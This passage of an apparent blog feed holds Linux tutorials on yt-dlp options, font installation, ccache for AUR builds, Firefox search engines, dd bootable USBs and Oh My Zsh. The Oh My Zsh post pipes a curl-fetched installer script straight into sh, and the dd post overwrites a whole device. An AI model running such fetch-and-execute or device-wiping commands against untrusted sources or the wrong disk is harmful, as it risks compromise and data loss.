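The list file itself can be created straight from the shell. A minimal sketch (the URLs below are placeholders; in the actual file, lines starting with `#` are treated as comments by yt-dlp):

```shell
# tee writes each placeholder URL into video_list (and echoes it to the terminal)
echo https://example.com/video1 | tee video_list
echo https://example.com/video2 | tee -a video_list
echo https://example.com/video3 | tee -a video_list
```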

## Chapter Handling

You can manage chapters in videos with yt-dlp, allowing you to navigate through different sections of a video seamlessly.

### Embed Chapters

The `--embed-chapters` option in yt-dlp embeds chapter markers directly into the video file itself. When you play the file in a player such as mpv, you can easily jump between chapters.

```shell
yt-dlp --embed-chapters [video URL]
```

### Splitting Videos with Chapter Precision

The `--split-chapters` option in yt-dlp enables you to split videos into chapters, creating distinct files for each chapter. This feature is particularly useful when you want to enjoy specific sections of a video without manual trimming or editing.

```shell
yt-dlp --split-chapters [video URL]
```

## Subtitle Management

yt-dlp offers a range of options for managing subtitles, including downloading subtitles in specific languages and embedding them into the video. Start by listing the available subtitles:

```bash
yt-dlp --list-subs [video URL]
```

Executing this command provides a detailed list of subtitle formats along with their respective names.

```shell
Language   Name                                Formats
en                                             vtt
ja                                             vtt
ko                                             vtt
af-en      Afrikaans from English              vtt, ttml, srv3, srv2, srv1, json3
ak-en      Akan from English                   vtt, ttml, srv3, srv2, srv1, json3
sq-en      Albanian from English               vtt, ttml, srv3, srv2, srv1, json3
...

[info] Available subtitles for fMIn43MiwG8:
Language Name     Formats
en       English  vtt, ttml, srv3, srv2, srv1, json3
ja       Japanese vtt, ttml, srv3, srv2, srv1, json3
ko       Korean   vtt, ttml, srv3, srv2, srv1, json3
```

It&apos;s crucial to note that this is the first of two listings and primarily contains auto-generated subtitles. For the main subtitles, written by humans, refer to the final list. In the given example, only three subtitles (en, ja, ko) were crafted by a human for the video.

### Downloading Language-Specific Subtitles and Embedding Them

Download subtitles in a specific language and embed them into the video with the following command:

```shell
yt-dlp --write-sub --embed-sub --sub-lang en [video URL]
```

![subtitle-en](./subtitle-en.png)

### Downloading All Available Subtitles (Excluding Auto-Gen)

This method fetches all non-auto-generated subtitles for the video:

```shell
yt-dlp --write-sub --embed-sub --all-subs [video URL]
```

![subtitle-all](./subtitle-all.png)

### Downloading Auto-Gen Subtitles

yt-dlp facilitates the download of auto-generated subtitles as well:

```shell
yt-dlp --write-auto-sub --embed-sub --all-subs [video URL]
```

![subtitle-autogen](./subtitle-autogen.png)

## Thumbnail Management

yt-dlp can also embed the video&apos;s thumbnail into the downloaded file. Here is the basic usage:

&gt;Note: This feature requires FFmpeg to embed the thumbnail.

```shell
yt-dlp --embed-thumbnail [video URL]
```

## Metadata Management

Metadata embedding is disabled by default. Metadata is descriptive information about the video, such as its title and uploader. To include it, add `--add-metadata` or `--embed-metadata`. For example:

```shell
yt-dlp --add-metadata [video URL]
yt-dlp --embed-metadata [video URL]
```

## Downloading Only Certain Files

How about downloading only the subtitles or the thumbnail? With yt-dlp you can easily do this with `--skip-download`. For instance:

```shell
yt-dlp --write-thumbnail --skip-download [video URL]
```

The `--write-*` options save the corresponding file to disk. The same applies to subtitles: if you use `--embed-sub` without `--write-sub`, the subtitles are embedded into the video, but no separate subtitle file is saved.
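Putting these flags together, fetching only the subtitle file without the video looks like this:

```shell
yt-dlp --write-sub --skip-download [video URL]
```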

## Downloading Many Videos (Playlists and Channels)

By default, downloading an entire channel or playlist works just like downloading a single video; no extra options are needed:

```shell
yt-dlp [channel URL]
yt-dlp [playlist URL]
```

## Playlist Management with yt-dlp

This section covers various yt-dlp commands for managing playlists, including downloading specific items, limiting the total number of downloads, and customizing output names.

- `--playlist-start [NUMBER]`: Begin downloading from the specified item number.
- `--playlist-end [NUMBER]`: Conclude downloading at the specified item number.
- `--playlist-items [ITEMS]`: Download specific items from the playlist (e.g. `1-10` or `5,8,12-15`).
- `--max-downloads [NUMBER]`: Limit the total number of downloads.

These commands provide granular control, enabling you to customize your download preferences for specific items or ranges within a playlist.

### Download a Specific Range of Items

To download a specific range of items, utilize the `--playlist-start` and `--playlist-end` options. For example, to download items from the third to the seventh in the playlist:

```shell
yt-dlp --playlist-start 3 --playlist-end 7 [playlist URL]
```

### Download a Specific Range (Starting Point)

If you only specify the starting point, yt-dlp will download from that point onward:

```shell
yt-dlp --playlist-start 3 [playlist URL]
```

### Download a Specific Range (Ending Point)

Similarly, specifying only the ending point results in downloading from the first item up to the specified point:

```shell
yt-dlp --playlist-end 20 [playlist URL]
```

### Download Specific Items

To download specific items, replace `[range]` with the items you want, such as `1-10` or `5,8,12-15`. Only the specified items are downloaded:

```bash
yt-dlp --playlist-items [range] [playlist URL]
```

### Limit the Total Number of Downloads

To cap the total number of downloads from the playlist, employ the `--max-downloads` option. For instance, to download a maximum of 10 items:

```shell
yt-dlp --max-downloads 10 [playlist URL]
```

## Output Naming Options

yt-dlp offers flexible options for specifying the output names of downloaded videos using the `-o` or `--output` parameter.

### Remove ID (with Format)

By default, the output name includes the YouTube title name and video ID. To exclude the ID, use the following format:

```shell
yt-dlp -o &quot;%(title)s.%(ext)s&quot; [video URL]
```
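Output templates can combine several fields. For instance, a common pattern (not specific to this guide) is to prefix each file with its position in the playlist:

```shell
yt-dlp -o &quot;%(playlist_index)02d %(title)s.%(ext)s&quot; [playlist URL]
```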

### Output with Your Name

You can customize the output name by specifying your desired name:

```shell
yt-dlp -o &quot;Example&quot; [video URL]
```

This results in the video being named `Example.webm`.

### Output with Your Name + Custom Extensions

If you want a specific format like MP4, you can customize both the name and extension:

&gt;Note: Ensure the specified file extension corresponds to the actual video format. If not, you may need to use ffmpeg to convert the downloaded video.

```shell
yt-dlp -o &quot;Example.mp4&quot; [video URL]
```

### Output with ID Only

If you prefer the output name to include only the video ID, use the `id` field in the output template (the standalone `--id` flag from youtube-dl was removed in yt-dlp):

```shell
yt-dlp -o &quot;%(id)s.%(ext)s&quot; [video URL]
```

The resulting output name could be something like `C-o8pTi6vd.webm`.

## Proxy Management

You can use a proxy to download videos, which can be useful for accessing videos limited to specific countries. Find a suitable proxy IP from a provider like [VPNOverview](https://vpnoverview.com/privacy/anonymous-browsing/free-proxy-servers/) and use it in yt-dlp:

```shell
yt-dlp --proxy [IP] [video URL]
```

## IP Protocol (v4, v6)

Control whether to use IPv4 or IPv6 with these options:

For IPv4:

```shell
yt-dlp -4 [video URL]
yt-dlp --force-ipv4 [video URL]
```

For IPv6:

```shell
yt-dlp -6 [video URL]
yt-dlp --force-ipv6 [video URL]
```

## Source Client IP

Specify the source client IP with:

```shell
yt-dlp --source-address [IP] [video URL]
```

## Limit Download Speed

Control the download speed to avoid impacting your network. For example, to limit the speed to 100K:

```shell
yt-dlp --limit-rate 100K [video URL]
```</content:encoded><author>UmmIt Kin &lt;root@ummit.dev&gt;</author></item><item><title>How to Install Custom Font Families in your Linux system</title><link>https://ummit.dev//posts/linux/undefine/install-font-family-on-your-linux/</link><guid isPermaLink="true">https://ummit.dev//posts/linux/undefine/install-font-family-on-your-linux/</guid><description>Learn how to install custom font families on your Linux system using command-line methods. Personalize your environment for a unique and visually appealing experience.</description><pubDate>Sat, 12 Aug 2023 00:00:00 GMT</pubDate><content:encoded>## Introduction

Customizing fonts is a simple yet impactful way to make your Linux system and applications truly your own. While clicking to install fonts can sometimes lead to inconsistencies, using the command-line interface (CLI) for installation ensures a reliable confirmation of font integration. Whether you&apos;re aiming for a personalized coding environment or a unique visual style, this guide will take you through the process of installing custom font families on your Linux system using CLI methods.

### Step 1: Download and Install Custom Fonts
To begin, you&apos;ll need to obtain the custom fonts you want to use. Websites like Google Fonts and Font Squirrel offer an array of fonts to choose from. Once you&apos;ve acquired your preferred fonts, follow these steps to install them on your Linux system using CLI:

1. **For All Users (/usr/share/fonts/):**
   - Create a directory for the font family within the system-wide fonts directory:

   ```bash
   sudo mkdir -p /usr/share/fonts/YourCustomFont
   ```

   - Copy the downloaded font files (usually in TrueType font format, .ttf) to the font family directory:

   ```bash
   sudo cp /path/to/font-file.ttf /usr/share/fonts/YourCustomFont/
   ```

   - Update the font cache to ensure the system recognizes the new fonts:

   ```bash
   sudo fc-cache -f -v
   ```

2. **For Current User (~/.local/share/fonts/):**
   - Create a directory for your fonts in your user&apos;s fonts directory (if it doesn&apos;t already exist):

   ```bash
   mkdir -p ~/.local/share/fonts
   ```

   - Copy the downloaded font files (usually in TrueType font format, .ttf) to your user&apos;s fonts directory:

   ```bash
   cp /path/to/font-file.ttf ~/.local/share/fonts/
   ```

   - Update the font cache to ensure your system recognizes the new fonts:

   ```bash
   fc-cache -f -v
   ```

### Step 2: Verify Available Fonts
To confirm that the newly installed fonts are recognized by your system, you can use the following command:

```bash
fc-list | grep &quot;YourCustomFont&quot;
```

## Optional: Configure Custom Font Families in Visual Studio Code
If you use Visual Studio Code and want to set a custom font family for your coding environment, you can follow these steps:

1. Launch Visual Studio Code.
2. Navigate to `File &gt; Preferences &gt; Settings`.

3. Alternatively, use the keyboard shortcut `Ctrl` + `,` or `Cmd` + `,`.

4. Search for &quot;font&quot; to locate the &quot;Text Editor: Font&quot; setting.

5. Click the &quot;Edit in settings.json&quot; link next to the setting.

6. In the `settings.json` file, add the following configuration to set your desired font family:

   ```text
   &quot;editor.fontFamily&quot;: &quot;YourCustomFont, monospace&quot;,
   ```

   Replace `&quot;YourCustomFont&quot;` with the name of the font you installed.

## Conclusion

Customizing fonts on your Linux system using CLI methods allows you to add a personal touch and enhance the visual aesthetics of your applications with a higher level of reliability. By following these steps and exploring different font options, you can transform your user experience and create a distinctive and engaging atmosphere that reflects your style. Enjoy the beauty of custom fonts on your Linux journey!</content:encoded><author>UmmIt Kin &lt;root@ummit.dev&gt;</author></item><item><title>Boost AUR Compilation in Arch Linux with ccache</title><link>https://ummit.dev//posts/linux/distribution/archlinux/archlinux-speedup-compilation-time-aur/</link><guid isPermaLink="true">https://ummit.dev//posts/linux/distribution/archlinux/archlinux-speedup-compilation-time-aur/</guid><description>Speed up AUR package compilation in Arch Linux using ccache. Follow our guide to unlock efficient multi-threading and caching, optimizing your software installation process.</description><pubDate>Sat, 12 Aug 2023 00:00:00 GMT</pubDate><content:encoded>## Introduction

Optimizing your Arch Linux experience goes beyond mere installation – it&apos;s about maximizing efficiency during software compilation. In this guide, we&apos;ll walk you through a powerful technique to dramatically reduce compilation times for AUR (Arch User Repository) packages using a tool called `ccache`.

## Step 1: Install `ccache`

The first step towards speeding up your AUR package compilation process is installing `ccache`. This clever tool caches previously compiled object files and metadata, enabling faster subsequent compilations. To install `ccache`, use the following command:

```bash
sudo pacman -S ccache
```

## Step 2: Customize `makepkg.conf`

Now, it&apos;s time to tailor your `makepkg.conf` file to optimize your Arch Linux system. Follow these steps:

1. Open the `makepkg.conf` file using your preferred text editor. You can use a command like this to open it in the Nano text editor:

   ```shell
   sudo nano /etc/makepkg.conf
   ```

   Or you can choose any other text editor you&apos;re comfortable with.

2. Inside the `makepkg.conf` file, you&apos;ll find a section called `BUILDENV`. Locate the line that resembles the following:

   ```bash
   BUILDENV=(!distcc color !ccache check !sign)
   ```

3. Remove the `!` symbol in front of `ccache` (and only `ccache`), like this:

   ```bash
   BUILDENV=(!distcc color ccache check !sign)
   ```

This adjustment enables the use of the `ccache` tool, which caches compilation output, thus speeding up subsequent builds.

## Step 3: Identify Your CPU Cores

Before we fine-tune the `MAKEFLAGS` settings, let&apos;s determine the exact number of CPU cores on your system. You can do this using either of the following methods:

- Use the `lscpu` command:

   ```shell
   lscpu
   ```

- Alternatively, you can employ the `nproc` command for a quick overview of the available CPU cores:

   ```shell
   nproc
   ```

   Make a note of this number; we&apos;ll use it in the next step to optimize compilation settings.

## Step 4: Optimize `MAKEFLAGS` for Your CPU

With the core count known, adjust the `MAKEFLAGS` variable in the `makepkg.conf` file accordingly. Locate the section for `MAKEFLAGS`, either by scrolling or by using `Ctrl+W` and typing `MAKEFLAGS`. Modify the line to allow for parallel compilation. For example, if your system has 10 CPU cores, set it as follows:

```bash
#-- Make Flags: change this for DistCC/SMP systems
MAKEFLAGS=&quot;-j10&quot;
```
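Rather than hardcoding the core count, you can also derive it dynamically. A minimal sketch using `nproc` (part of GNU coreutils):

```bash
# Build the flag from the actual number of CPU cores
MAKEFLAGS=-j$(nproc)
echo $MAKEFLAGS
```

In `makepkg.conf` itself, the equivalent would be `MAKEFLAGS=&quot;-j$(nproc)&quot;`.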

## Step 5: Add `ccache` to PATH

For seamless access to `ccache` commands, we&apos;ll add the `ccache` binary directory to your system&apos;s PATH. Open your shell&apos;s configuration file using your favorite text editor:

### For `bash` Users:

```bash
nano ~/.bashrc
```

### For `zsh` Users:

```bash
nano ~/.zshrc
```

Add the following line to the bottom of the file:

```bash
export PATH=&quot;/usr/lib/ccache/bin/:$PATH&quot;
```

Save the changes and exit the text editor.

## Step 6: Refresh Configuration and Apply Changes

To apply the changes made to your shell&apos;s configuration file, you need to refresh the shell&apos;s configuration. This ensures that the new PATH settings for `ccache` are immediately available. Here&apos;s how you can do it:

### For `bash` Users:

```bash
source ~/.bashrc
```

The `source` command reads and executes commands from the specified file (in this case, `~/.bashrc`), making the changes take effect in the current terminal session.

### For `zsh` Users:

```bash
source ~/.zshrc
```

Similarly, `source` is used to execute the commands in `~/.zshrc`, updating the configuration in your current terminal session.

By using the `source` command, you ensure that your shell recognizes the updated PATH and other configuration changes, allowing you to use `ccache` seamlessly without needing to open a new terminal window.

## Step 7: Verify PATH Configuration

To ensure that the `ccache` directory has been added to your PATH successfully, you can check the PATH variable. Open a new terminal window to apply any recent changes and then enter the following command:

```bash
echo $PATH
```

If you see `/usr/lib/ccache/bin/` included in the output, it confirms that the PATH configuration has been successfully applied.

### Bonus Tip: Exploring Paths

If you&apos;re curious about the different paths in your `$PATH`, you can use the `echo` command in combination with the `tr` command to list each path on a separate line. This can give you a clearer view of the directories included in your PATH. Run the following command:

```bash
echo $PATH | tr &apos;:&apos; &apos;\n&apos;
```

This will display a list of directories that are part of your `$PATH`. You can then scan through the list to see if the `/usr/lib/ccache/bin/` directory is indeed included.

## Conclusion

By incorporating `ccache` and optimizing your compilation settings, you&apos;ve unlocked a new level of efficiency in your Arch Linux environment. The software installation process becomes remarkably faster, allowing you to focus on exploring and using the software you need without the wait.

Harness the power of `ccache` to supercharge your AUR package compilation, making your Arch Linux journey even more seamless and enjoyable.

## Reference

- https://ostechnix.com/speed-compilation-process-installing-packages-aur/</content:encoded><author>UmmIt Kin &lt;root@ummit.dev&gt;</author></item><item><title>Customizing Default Search Engine in Firefox Desktop</title><link>https://ummit.dev//posts/browser/firefox/firefox-custom-searchengine/</link><guid isPermaLink="true">https://ummit.dev//posts/browser/firefox/firefox-custom-searchengine/</guid><description>This article show you how to customize your default search engine on Firefox desktop.</description><pubDate>Fri, 11 Aug 2023 00:00:00 GMT</pubDate><content:encoded>## Introduction

If you&apos;re a Firefox user looking to set a different default search engine in the desktop version, you might have noticed that while this option is available in the mobile version, it&apos;s not as straightforward on desktop. By default, you&apos;re limited to a set of preset search engine options such as `DuckDuckGo`, `Google`, and `Bing`. Let&apos;s dive into how you can customize your default search engine in Firefox desktop :)

### Modifying Firefox Configuration

Before we dive into the steps, keep in mind that these instructions involve modifying Firefox&apos;s configuration settings, which requires a bit of technical know-how. But don&apos;t worry, we&apos;ll guide you through the process.

### Step 1: Accessing the Configuration Page

1. Open Firefox and type `about:config` in the address bar.
2. You&apos;ll see a warning message about the risks of changing advanced settings. Click on the `Accept the Risk and Continue` button to proceed.

![about:config](./about-config.png)

### Step 2: Enabling Additional Search Engines

1. In the search bar at the top of the `about:config` page, enter `browser.urlbar.update2.engineAliasRefresh`.

2. Locate the preference named `browser.urlbar.update2.engineAliasRefresh` and double-click on it to toggle its value from `false` to `true`.

   ![browser.urlbar.update2.engineAliasRefresh](./browser.urlbar.update2.engineAliasRefresh.png)

### Step 3: Adding Your Preferred Search Engine

1. Now, head back to the Firefox search settings. You&apos;ll notice a new option: `Add.` Click on this option.

   ![Add new search engine](./Add.png)

2. Enter the details of your preferred search engine:

   - Search Engine Name: SearXNG
   - Engine URL: `https://search.ononoki.org/search?q=%s`
   - Alias: @SearXNG

![about:config](./added.png)

3. Click `Add Engine` to save your custom search engine.

### Step 4: Set Your Custom Search Engine as Default

1. Return to the search settings and find your newly added search engine in the list.

2. Click on the three-dot menu next to your custom search engine and select `Set as Default.`

## Conclusion

I recall searching for information on how to customize the default search engine in Firefox desktop, but I struggled to find any useful resources on the topic. While there are methods that involve using extensions, I preferred not to install any additional extension for this purpose.

Eventually, I discovered a solution on Stack Overflow, and I compiled the information provided there, adding images to enhance clarity and make it easier to understand.</content:encoded><author>UmmIt Kin &lt;root@ummit.dev&gt;</author></item><item><title>Crafting a Bootable USB Drive with dd and for Your Linux Installation</title><link>https://ummit.dev//posts/linux/undefine/creating-a-bootable-usb-drive-for-your-linux-installation/</link><guid isPermaLink="true">https://ummit.dev//posts/linux/undefine/creating-a-bootable-usb-drive-for-your-linux-installation/</guid><description>Crafting a Bootable USB Drive with &apos;dd&apos;: Your Gateway to Linux Installation</description><pubDate>Fri, 11 Aug 2023 00:00:00 GMT</pubDate><content:encoded>## Introduction

When embarking on a new Linux adventure, having a reliable bootable USB drive is your trusty companion. It&apos;s the key that unlocks the door to a world of new possibilities and operating systems. In this guide, we&apos;ll walk you through the process of creating a bootable USB drive using the powerful and versatile `dd` command. Other tools like `BalenaEtcher` and `Brasero` are available, but this post focuses on the nitty-gritty details of `dd`. Since `dd` ships with most distributions, it&apos;s effectively a built-in tool, providing you with a solid foundation to kickstart your Linux installation journey.

Creating a bootable USB drive is an essential skill for any Linux enthusiast. Whether you&apos;re starting a fresh installation, rescuing a system, or trying out a new distribution, having one at your disposal is incredibly useful.

&gt;**This method only works with Linux distributions. Windows is not supported.**

### Prerequisites

Before we begin making the bootable pen drive, please back up any existing data on it, as the `dd` command will overwrite it. Then make sure you have the following:

- A USB flash drive with sufficient capacity (8GB or more is recommended)
- The ISO file of the Linux distribution you want to install or use (Ubuntu, Linux Mint, Manjaro, etc.)
- **A backup of your DATA!!!!**

### Step 1: Identify Your USB Drive

First, you need to identify the device name of your USB drive. Open a terminal and use the `lsblk` command to list all available block devices:

```shell
lsblk
```

Identify your USB drive based on its size and storage capacity. It will typically be listed as something like `/dev/sdX`, where `X` is a letter corresponding to your USB drive.

### Step 2: Prepare the USB Drive

Before creating the bootable USB, make sure the USB drive is unmounted. You can use the `umount` command followed by the device name to unmount any existing partitions on the USB drive. Replace `/dev/sdX` with your USB drive&apos;s device name:

```shell
sudo umount /dev/sdX
```

### Step 3: Write the ISO File to the USB Drive

With the USB drive properly formatted and ready, it&apos;s time to transfer the Linux distribution ISO file onto it. To accomplish this, we will use the ``dd`` command, a powerful yet potentially risky tool. Pay close attention and follow the instructions carefully to avoid accidental data loss.

&gt;Note: Point `dd` at the whole device (for example `/dev/sdX`), not at a partition such as `/dev/sdX1`. You also do not need to create a filesystem on the pen drive beforehand; writing the ISO image in the next step takes care of everything.

1. Replace `path/to/iso` in the command below with the actual file path of the downloaded Linux distribution ISO file.

2. Identify the correct device name of your USB drive. Ensure this is accurate, as the ``dd`` command will overwrite the designated device. To identify the correct device name, you can use the `lsblk` command.

3. Replace `/dev/sdX` in the command below with the correct device name of your USB drive. Triple-check this to avoid any mistakes.

4. Execute the command:

    ```shell
    sudo dd bs=4M if=path/to/iso of=/dev/sdX status=progress oflag=sync
    ```

   - `sudo`: Runs the command with superuser privileges.
   - ``dd``: The command used for data duplication.
   - `bs=4M`: Sets the block size to 4 megabytes for efficient data transfer.
   - `if=path/to/iso`: Specifies the input file (your Linux ISO).
   - `of=/dev/sdX`: Specifies the output file (your USB drive).
   - `status=progress`: Displays the progress of the data transfer.
   - `oflag=sync`: Flushes data to the output file after each write operation.

5. Wait for the process to complete. The terminal will display the progress as the ISO file is written to the USB drive.

6. Once the process is finished, the terminal will display the final summary, and you&apos;ll be returned to the command prompt.

Remember, the `dd` command has the potential to overwrite data irreversibly. Double-check your command, ensuring the correct paths and device names are used. It&apos;s always a good practice to disconnect any other external drives to minimize the risk of accidentally overwriting the wrong drive.

By following these steps, you&apos;ll successfully write the Linux distribution ISO to your USB drive, transforming it into a bootable medium ready for your Linux installation journey.

### Step 4: Safely Eject the USB Drive

After the ``dd`` command completes, you&apos;ll have a bootable USB drive. Before unplugging the drive, ensure that all data has been written and synced. You can use the `sync` command to flush any pending data to the USB drive:

```shell
sync
```

Then safely eject the USB drive using the `eject` command:

```shell
sudo eject /dev/sdX
```

### Step 5: Boot from the USB Drive

Now that your bootable USB drive is ready, you can use it to boot into a live Linux environment or install the operating system. Insert the USB drive into the target computer, restart it, and access the boot menu to select the USB drive as the boot device. The key to access the boot menu varies depending on your computer&apos;s manufacturer (common keys include `F2`, `F12`, `ESC`, or `DEL`).

## Conclusion

Creating a bootable USB drive for your Linux installation is a valuable skill that comes in handy for various scenarios. Whether you&apos;re installing a new Linux distribution, rescuing a system, or performing system maintenance, having a bootable USB drive can save the day. By following these simple steps and using the ``dd`` command, you can quickly and effectively create a bootable USB drive and unleash the power of Linux wherever you need it.</content:encoded><author>UmmIt Kin &lt;root@ummit.dev&gt;</author></item><item><title>Installing Oh My Zsh and Customizing Themes</title><link>https://ummit.dev//posts/linux/tools/terminal/omz/ohmyzsh-install/</link><guid isPermaLink="true">https://ummit.dev//posts/linux/tools/terminal/omz/ohmyzsh-install/</guid><description>Oh My Zsh is a popular and powerful shell customization framework that enhances the functionality and aesthetics of your terminal. it allows you to personalize your command-line experience to suit your preferences.</description><pubDate>Fri, 11 Aug 2023 00:00:00 GMT</pubDate><content:encoded>## Oh My Zsh

Oh My Zsh is a popular and powerful shell customization framework that enhances the functionality and aesthetics of your terminal. With a wide range of features and themes, it allows you to personalize your command-line experience to suit your preferences. In this guide, we will walk you through the process of installing Oh My Zsh and customizing a theme to make your terminal more functional and visually appealing.

### Step 1: Install Zsh

1. Open your terminal application.
2. Check if Zsh is already installed by running the command:

```shell
zsh --version
```

3. If Zsh is not installed, you can install it using your system&apos;s package manager. For Arch-based systems:

```shell
sudo pacman -S zsh
```

4. Once Zsh is installed, you can switch to the Zsh shell by typing:

```shell
zsh
```

### Step 2: Install Oh My Zsh

1. With Zsh installed, proceed to install Oh My Zsh. In your Zsh shell, execute:

```shell
sh -c &quot;$(curl -fsSL https://raw.githubusercontent.com/ohmyzsh/ohmyzsh/master/tools/install.sh)&quot;
```

2. Follow the prompts to set Zsh as your default shell.

&gt;Note: After configuring zsh as your default shell, you may need to log out and back in (or reboot) to ensure that zsh is the default shell when launching the terminal.
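If the installer did not change your login shell, you can set it yourself (`chsh` will prompt for your password):

```shell
chsh -s $(which zsh)
```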

## Switching Themes in Oh My Zsh

Changing themes in Oh My Zsh is a breeze and allows you to transform the appearance of your terminal to suit your style. Follow these simple steps to switch to a different theme and give your terminal a fresh new look:

**Step 1: List Available Themes**

Begin by exploring the available themes using the `omz theme list` command. This command will display a list of all the themes that you can choose from:

```shell
omz theme list
```

**Step 2: Choose a New Theme**

Identify the theme that resonates with your style and workflow from the list provided by the `omz theme list` command.

**Step 3: Update the Theme**

To switch to the chosen theme, you need to update your Zsh configuration. Open the `.zshrc` file in a text editor. You can use the `nano` editor for this purpose:

```shell
nano ~/.zshrc
```

**Step 4: Change the Theme**

Within the `.zshrc` file, you will find a line that defines the `ZSH_THEME` variable. It typically looks like this:

```shell
ZSH_THEME=&quot;robbyrussell&quot;
```

Replace `&quot;robbyrussell&quot;` with the name of the theme you want to switch to. For instance, if you want to switch to the &quot;awesomepanda&quot; theme, modify the line as follows:

```shell
ZSH_THEME=&quot;awesomepanda&quot;
```

**Step 5: Save and Exit**

After making the change, save the file by pressing `Ctrl` + `O`, and then press `Enter`. To exit the editor, press `Ctrl` + `X`.

**Step 6: Apply the Changes**

To apply the new theme, you can either close and reopen your terminal or run the following command:

```shell
source ~/.zshrc
```
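Steps 3 to 6 can also be scripted with `sed`. A sketch run against a throwaway copy so the real `~/.zshrc` stays untouched; `awesomepanda` is just the example theme:

```shell
# Create a demo config with the default theme, then rewrite the ZSH_THEME line
printf 'ZSH_THEME="robbyrussell"\n' > /tmp/zshrc-demo
sed -i 's/^ZSH_THEME=.*/ZSH_THEME="awesomepanda"/' /tmp/zshrc-demo
grep '^ZSH_THEME' /tmp/zshrc-demo
```

On a real system, point `sed` at `~/.zshrc` instead and then run `source ~/.zshrc` to apply the change.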

**Step 7: Enjoy Your New Theme**

Voila! You&apos;ve successfully changed the theme of your Oh My Zsh-powered terminal. The next time you open a terminal session, you&apos;ll experience the charm of the new theme in action.

## Essential Commands

### Command 1: `omz update`

Staying up-to-date is vital, and the `omz update` command is your shortcut to ensuring that your Oh My Zsh installation and its components are current. From plugins to themes, running this command keeps you on the cutting edge, enjoying bug fixes, feature enhancements, and performance boosts.

To execute the update, simply open your terminal and type:

```shell
omz update
```

### Command 2: `omz help`

When uncertainty arises, the `omz help` command is your trusty companion. A one-stop repository of Oh My Zsh&apos;s commands and features, this command serves as your instant reference guide. It displays a comprehensive list of available commands alongside concise explanations of their purposes.

Access the help documentation with a simple command:

```shell
omz help
```

### Command 3: `omz reload`

The `omz reload` command applies configuration changes without restarting your shell. Whenever you modify your Oh My Zsh configuration or add new plugins, a simple execution of this command refreshes your environment, ensuring that the changes take effect immediately.

Type the following command in your terminal:

```shell
omz reload
```

### Command 4: `omz version`

Stay informed about your Oh My Zsh installation with the `omz version` command. This handy command reveals the currently installed version of Oh My Zsh, allowing you to monitor your setup&apos;s status and track any updates or modifications over time.

```shell
omz version
```

With these additional commands at your disposal, you have a more comprehensive grasp of Oh My Zsh&apos;s capabilities. These tools enable you to manage your shell environment efficiently and stay updated on its status.

## In Conclusion

Mastering these essential commands unlocks the true potential of Oh My Zsh, elevating your terminal proficiency. From effortless updates to theme customization and command references, you&apos;re equipped to conquer the command line with finesse. Embrace these tools, and watch as your terminal transforms into a productivity powerhouse. Happy terminal hacking!</content:encoded><author>UmmIt Kin &lt;root@ummit.dev&gt;</author></item><item><title>Oh My Zsh: Must-Have Plugins</title><link>https://ummit.dev//posts/linux/tools/terminal/omz/ohmyzsh-plugins/</link><guid isPermaLink="true">https://ummit.dev//posts/linux/tools/terminal/omz/ohmyzsh-plugins/</guid><description>Discover the transformative magic of Oh My Zsh, the acclaimed shell customization framework that elevates both the functionality and aesthetics of your terminal.</description><pubDate>Fri, 11 Aug 2023 00:00:00 GMT</pubDate><content:encoded>## Why use plugins?

Oh-My-Zsh plugins are the secret sauce that can transform your terminal life. Imagine having a terminal that anticipates your needs, boosts your efficiency, and just feels right. Well, with these powerful plugins, you&apos;re about to embark on a journey to terminal enlightenment. Ready to explore? Dive in: [Oh-My-Zsh Plugins](https://github.com/ohmyzsh/ohmyzsh/wiki/Plugins)

## Git Plugin: Your Versatile Commandeer

Harnessing the power of the Git plugin within Oh My Zsh is a seamless journey that yields incredible results. By default, this plugin is already activated upon installation, ready to elevate your terminal prowess. However, if you ever wish to ensure its presence, these steps will guide your way:

1. Unlock the gateway to configuration by opening your `~/.zshrc` file:

```shell
nano ~/.zshrc
```

2. Traverse the script to locate the revered `plugins` section. Here, make certain that `git` is securely enlisted:

```shell
plugins=( git )
```

3. Seal your changes and depart from the text editor&apos;s realm.

## Install zsh-autosuggestions

The zsh-autosuggestions plugin acts as your intuitive guide, enriching your command-line interactions with unparalleled finesse. This remarkable plugin observes your keystrokes, channeling its insights from your command history to offer suggestions tailored to your context. It&apos;s akin to conversing with a terminal that understands your intentions.

1. Begin your odyssey by unlocking your terminal&apos;s gateway.
2. Navigate to the sacred grounds of custom plugins by entering:

```shell
cd ~/.oh-my-zsh/custom/plugins
```

3. Unleash the power of zsh-autosuggestions by invoking the following incantation:

```shell
git clone https://github.com/zsh-users/zsh-autosuggestions
```

### Apply zsh-autosuggestions to your shell

Prepare to sculpt your terminal interactions into an intuitive symphony, guided by the zsh-autosuggestions plugin.

1. Reenter the terminal&apos;s domain, ready to shape your experience.
2. Manipulate the script of destiny by accessing the Zsh configuration file:

```shell
nano ~/.zshrc
```

3. Traverse the mystic grounds until you encounter the sacred `plugins` realm. Here, usher in zsh-autosuggestions alongside the plugins already enlisted (the array replaces the previous list, so keep `git`):

```shell
plugins=(git zsh-autosuggestions)
```

4. Etch your alterations into existence and retreat from the text editor&apos;s realm.
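The same edit can be scripted. A sketch on a throwaway copy; note again that the `plugins` array replaces the previous list, so keep `git` (and any other plugins you rely on) in it:

```shell
# Demo config with only the default git plugin enabled
printf 'plugins=(git)\n' > /tmp/zshrc-plugins-demo
# Rewrite the plugins line, keeping git alongside zsh-autosuggestions
sed -i 's/^plugins=.*/plugins=(git zsh-autosuggestions)/' /tmp/zshrc-plugins-demo
grep '^plugins' /tmp/zshrc-plugins-demo
```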

#### See the effect

1. Close your terminal, allowing the old to merge with the new.
2. As you reopen your terminal, a new epoch emerges.
3. Evoke your commands with a renewed sense of purpose, as zsh-autosuggestions weave their enchantment.

Each keystroke becomes an act of collaboration. The terminal&apos;s uncanny intelligence draws from your history, guiding your commands with remarkable precision. Suggestions gracefully unfurl, a testament to the harmony of instinct and technology. The terminal transcends its role as a mere tool, transforming into an intuitive companion that empowers your journey through the digital realm.</content:encoded><author>UmmIt Kin &lt;root@ummit.dev&gt;</author></item><item><title>Resolving ntfs-3g Mounting Issue on your Linux</title><link>https://ummit.dev//posts/linux/undefine/resolving-ntfs-3g-mounting-issue/</link><guid isPermaLink="true">https://ummit.dev//posts/linux/undefine/resolving-ntfs-3g-mounting-issue/</guid><description>fix the &apos;unknown filesystem type ntfs&apos; error and enable successful mounting of NTFS partitions on your Linux system.</description><pubDate>Thu, 10 Aug 2023 00:00:00 GMT</pubDate><content:encoded>## NTFS Compatibility

